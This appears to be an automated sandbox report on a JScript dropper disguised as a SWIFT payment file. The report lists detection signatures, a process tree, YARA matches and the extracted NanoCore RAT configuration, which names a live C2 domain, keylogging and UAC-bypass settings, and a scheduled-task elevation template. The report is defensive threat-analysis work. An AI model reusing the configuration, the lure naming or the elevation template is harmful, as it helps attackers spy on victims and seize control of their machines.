Edit tour

Windows Analysis Report
SWIFT MO104978172_1301 EURO 9700.js

Overview

General Information

Sample Name:	SWIFT MO104978172_1301 EURO 9700.js
Analysis ID:	796930
MD5:	0d6f726c3c2a4f6e82f0ede90ba88155
SHA1:	668eb996c241e10fb19c3a6ae5024309470be171
SHA256:	658c78c61ac43dc28e128cd71060b2c5ab03ed241cbcd32c5a0f5a09f081a574
Tags:	jsNanoCoreRAT
Infos:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

JScript performs obfuscated calls to suspicious functions

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Sigma detected: NanoCore

Detected Nanocore Rat

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Yara detected Nanocore RAT

Detected unpacking (creates a PE file in dynamic memory)

Maps a DLL or memory area into another process

.NET source code contains potential unpacker

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

Java / VBScript file with very long strings (likely obfuscated code)

Installs a raw input device (often for capturing keystrokes)

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

JavaScript source code contains large arrays or strings with random content potentially encoding malicious code

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5140 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT MO104978172_1301 EURO 9700.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

SWIFT MO104978172_1301 EURO 9700.exe (PID: 3396 cmdline: "C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe" MD5: E1EA8B4960D24E0E5742BBFCB3C0B240)

fdqkbs.exe (PID: 1368 cmdline: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v MD5: 34037A20C292EAB6F90C3D9AB1334348)

fdqkbs.exe (PID: 5336 cmdline: C:\Users\user\AppData\Local\Temp\fdqkbs.exe MD5: 34037A20C292EAB6F90C3D9AB1334348)

fdqkbs.exe (PID: 5316 cmdline: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" MD5: 34037A20C292EAB6F90C3D9AB1334348)

WerFault.exe (PID: 3360 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 624 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

syhbwgs.exe (PID: 4612 cmdline: "C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe" "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD MD5: 34037A20C292EAB6F90C3D9AB1334348)

WerFault.exe (PID: 3228 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 656 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

syhbwgs.exe (PID: 1808 cmdline: "C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe" "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD MD5: 34037A20C292EAB6F90C3D9AB1334348)

WerFault.exe (PID: 4756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 628 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "82fe3011-00e2-4a52-9361-cad1a21d", "Group": "bition1", "Domain1": "bition.duckdns.org", "Domain2": "bition.duckdns.org", "Port": 8817, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "bition.duckdns.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x2c26d:$x1: NanoCore.ClientPluginHost 0x2c2aa:$x2: IClientNetworkHost 0x2fddd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3148:$a: NanoCore 0x2bfd5:$a: NanoCore 0x2bfe5:$a: NanoCore 0x2c219:$a: NanoCore 0x2c22d:$a: NanoCore 0x2c26d:$a: NanoCore 0x2c034:$b: ClientPlugin 0x2c236:$b: ClientPlugin 0x2c276:$b: ClientPlugin 0x2c15b:$c: ProjectData 0x2cb62:$d: DESCrypto 0x3452e:$e: KeepAlive 0x3251c:$g: LogClientMessage 0x2e717:$i: get_Connected 0x2ce98:$j: #=q 0x2cec8:$j: #=q 0x2cee4:$j: #=q 0x2cf14:$j: #=q 0x2cf30:$j: #=q 0x2cf4c:$j: #=q 0x2cf7c:$j: #=q
00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x2c26d:$a1: NanoCore.ClientPluginHost 0x2c22d:$a2: NanoCore.ClientPlugin 0x2e186:$b1: get_BuilderSettings 0x2c089:$b2: ClientLoaderForm.resources 0x2d8a6:$b3: PluginCommand 0x2c25e:$b4: IClientAppHost 0x366de:$b5: GetBlockHash 0x2e7de:$b6: AddHostEntry 0x324d1:$b7: LogClientException 0x2e74b:$b8: PipeExists 0x2c297:$b9: IClientLoggingHost
00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x121e5:$x1: NanoCore.ClientPluginHost 0x12222:$x2: IClientNetworkHost 0x15d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x11f4d:$a: NanoCore 0x11f5d:$a: NanoCore 0x12191:$a: NanoCore 0x121a5:$a: NanoCore 0x121e5:$a: NanoCore 0x11fac:$b: ClientPlugin 0x121ae:$b: ClientPlugin 0x121ee:$b: ClientPlugin 0x120d3:$c: ProjectData 0x12ada:$d: DESCrypto 0x1a4a6:$e: KeepAlive 0x18494:$g: LogClientMessage 0x1468f:$i: get_Connected 0x12e10:$j: #=q 0x12e40:$j: #=q 0x12e5c:$j: #=q 0x12e8c:$j: #=q 0x12ea8:$j: #=q 0x12ec4:$j: #=q 0x12ef4:$j: #=q 0x12f10:$j: #=q
00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x121e5:$a1: NanoCore.ClientPluginHost 0x121a5:$a2: NanoCore.ClientPlugin 0x140fe:$b1: get_BuilderSettings 0x12001:$b2: ClientLoaderForm.resources 0x1381e:$b3: PluginCommand 0x121d6:$b4: IClientAppHost 0x1c656:$b5: GetBlockHash 0x14756:$b6: AddHostEntry 0x18449:$b7: LogClientException 0x146c3:$b8: PipeExists 0x1220f:$b9: IClientLoggingHost
00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x1266b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xff8d:$a1: NanoCore.ClientPluginHost 0xff4d:$a2: NanoCore.ClientPlugin 0x11ea6:$b1: get_BuilderSettings 0xfda9:$b2: ClientLoaderForm.resources 0x115c6:$b3: PluginCommand 0xff7e:$b4: IClientAppHost 0x1a3fe:$b5: GetBlockHash 0x124fe:$b6: AddHostEntry 0x161f1:$b7: LogClientException 0x1246b:$b8: PipeExists 0xffb7:$b9: IClientLoggingHost
00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4318d:$a: NanoCore 0x431e6:$a: NanoCore 0x43223:$a: NanoCore 0x4329c:$a: NanoCore 0x56947:$a: NanoCore 0x5695c:$a: NanoCore 0x56991:$a: NanoCore 0x6f94b:$a: NanoCore 0x6f960:$a: NanoCore 0x6f995:$a: NanoCore 0x431ef:$b: ClientPlugin 0x4322c:$b: ClientPlugin 0x43b2a:$b: ClientPlugin 0x43b37:$b: ClientPlugin 0x56703:$b: ClientPlugin 0x5671e:$b: ClientPlugin 0x5674e:$b: ClientPlugin 0x56965:$b: ClientPlugin 0x5699a:$b: ClientPlugin 0x6f707:$b: ClientPlugin 0x6f722:$b: ClientPlugin
00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x43223:$a1: NanoCore.ClientPluginHost 0x56991:$a1: NanoCore.ClientPluginHost 0x6f995:$a1: NanoCore.ClientPluginHost 0x431e6:$a2: NanoCore.ClientPlugin 0x5695c:$a2: NanoCore.ClientPlugin 0x6f960:$a2: NanoCore.ClientPlugin 0x435ba:$b1: get_BuilderSettings 0x5b8d7:$b1: get_BuilderSettings 0x748db:$b1: get_BuilderSettings 0x43271:$b4: IClientAppHost 0x4362b:$b6: AddHostEntry 0x4369a:$b7: LogClientException 0x5b846:$b7: LogClientException 0x7484a:$b7: LogClientException 0x4360f:$b8: PipeExists 0x4325e:$b9: IClientLoggingHost 0x569ab:$b9: IClientLoggingHost 0x6f9af:$b9: IClientLoggingHost
00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1c91f:$a: NanoCore 0x1c978:$a: NanoCore 0x1c9b5:$a: NanoCore 0x1ca2e:$a: NanoCore 0x1c981:$b: ClientPlugin 0x1c9be:$b: ClientPlugin 0x1d2bc:$b: ClientPlugin 0x1d2c9:$b: ClientPlugin 0x12a9f:$e: KeepAlive 0x1ce09:$g: LogClientMessage 0x1cd89:$i: get_Connected 0xcd55:$j: #=q 0xcd85:$j: #=q 0xcdc1:$j: #=q 0xcde9:$j: #=q 0xce19:$j: #=q 0xce49:$j: #=q 0xce79:$j: #=q 0xcea9:$j: #=q 0xcec5:$j: #=q 0xcef5:$j: #=q
00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1c9b5:$a1: NanoCore.ClientPluginHost 0x1c978:$a2: NanoCore.ClientPlugin 0xe28f:$b1: get_BuilderSettings 0x1cd4c:$b1: get_BuilderSettings 0x1ca03:$b4: IClientAppHost 0x1cdbd:$b6: AddHostEntry 0xe1fe:$b7: LogClientException 0x1ce2c:$b7: LogClientException 0x1cda1:$b8: PipeExists 0x1c9f0:$b9: IClientLoggingHost
00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x146bd:$x1: NanoCore.ClientPluginHost 0x146fa:$x2: IClientNetworkHost 0x1822d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x14425:$a: NanoCore 0x14435:$a: NanoCore 0x14669:$a: NanoCore 0x1467d:$a: NanoCore 0x146bd:$a: NanoCore 0x14484:$b: ClientPlugin 0x14686:$b: ClientPlugin 0x146c6:$b: ClientPlugin 0x145ab:$c: ProjectData 0x14fb2:$d: DESCrypto 0x1c97e:$e: KeepAlive 0x1a96c:$g: LogClientMessage 0x16b67:$i: get_Connected 0x152e8:$j: #=q 0x15318:$j: #=q 0x15334:$j: #=q 0x15364:$j: #=q 0x15380:$j: #=q 0x1539c:$j: #=q 0x153cc:$j: #=q 0x153e8:$j: #=q
00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x146bd:$a1: NanoCore.ClientPluginHost 0x1467d:$a2: NanoCore.ClientPlugin 0x165d6:$b1: get_BuilderSettings 0x144d9:$b2: ClientLoaderForm.resources 0x15cf6:$b3: PluginCommand 0x146ae:$b4: IClientAppHost 0x1eb2e:$b5: GetBlockHash 0x16c2e:$b6: AddHostEntry 0x1a921:$b7: LogClientException 0x16b9b:$b8: PipeExists 0x146e7:$b9: IClientLoggingHost
Process Memory Space: fdqkbs.exe PID: 5336	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x131a4:$x1: NanoCore.ClientPluginHost 0x2ba3d:$x1: NanoCore.ClientPluginHost 0x43b9f:$x1: NanoCore.ClientPluginHost 0x60381:$x1: NanoCore.ClientPluginHost 0x64a31:$x1: NanoCore.ClientPluginHost 0x90c09:$x1: NanoCore.ClientPluginHost 0x131e1:$x2: IClientNetworkHost 0x2ba7a:$x2: IClientNetworkHost 0x43bb9:$x2: IClientNetworkHost 0x6039b:$x2: IClientNetworkHost 0x64a6e:$x2: IClientNetworkHost 0x90c46:$x2: IClientNetworkHost 0x16cd2:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x21d58:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2f56b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3a5f1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x6855f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x735e5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x94737:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x9f7bd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: fdqkbs.exe PID: 5336	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: fdqkbs.exe PID: 5336	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x12e71:$a: NanoCore 0x12e81:$a: NanoCore 0x12f40:$a: NanoCore 0x12f4f:$a: NanoCore 0x13150:$a: NanoCore 0x13164:$a: NanoCore 0x131a4:$a: NanoCore 0x1e3c2:$a: NanoCore 0x1e3d4:$a: NanoCore 0x1e410:$a: NanoCore 0x2b70a:$a: NanoCore 0x2b71a:$a: NanoCore 0x2b7d9:$a: NanoCore 0x2b7e8:$a: NanoCore 0x2b9e9:$a: NanoCore 0x2b9fd:$a: NanoCore 0x2ba3d:$a: NanoCore 0x36c5b:$a: NanoCore 0x36c6d:$a: NanoCore 0x36ca9:$a: NanoCore 0x43b09:$a: NanoCore
Process Memory Space: fdqkbs.exe PID: 5336	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x131a4:$a1: NanoCore.ClientPluginHost 0x2ba3d:$a1: NanoCore.ClientPluginHost 0x43b9f:$a1: NanoCore.ClientPluginHost 0x60381:$a1: NanoCore.ClientPluginHost 0x64a31:$a1: NanoCore.ClientPluginHost 0x90c09:$a1: NanoCore.ClientPluginHost 0x13164:$a2: NanoCore.ClientPlugin 0x2b9fd:$a2: NanoCore.ClientPlugin 0x43b62:$a2: NanoCore.ClientPlugin 0x60344:$a2: NanoCore.ClientPlugin 0x649f1:$a2: NanoCore.ClientPlugin 0x90bc9:$a2: NanoCore.ClientPlugin 0x1507b:$b1: get_BuilderSettings 0x2d914:$b1: get_BuilderSettings 0x43f19:$b1: get_BuilderSettings 0x59ae5:$b1: get_BuilderSettings 0x66908:$b1: get_BuilderSettings 0x92ae0:$b1: get_BuilderSettings 0x12f25:$b2: ClientLoaderForm.resources 0x2b7be:$b2: ClientLoaderForm.resources 0x647b2:$b2: ClientLoaderForm.resources
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.fdqkbs.exe.417058.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.2.fdqkbs.exe.417058.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
3.2.fdqkbs.exe.417058.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.fdqkbs.exe.417058.0.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
3.2.fdqkbs.exe.417058.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
3.2.fdqkbs.exe.417058.0.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x1266b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
3.2.fdqkbs.exe.254bb40.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
3.2.fdqkbs.exe.254bb40.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
3.2.fdqkbs.exe.254bb40.4.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x11f9:$s6: get_ClientSettings 0x1249:$s7: get_Connected
3.2.fdqkbs.exe.254bb40.4.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost
3.2.fdqkbs.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x271e5:$x1: NanoCore.ClientPluginHost 0x27222:$x2: IClientNetworkHost 0x2ad55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
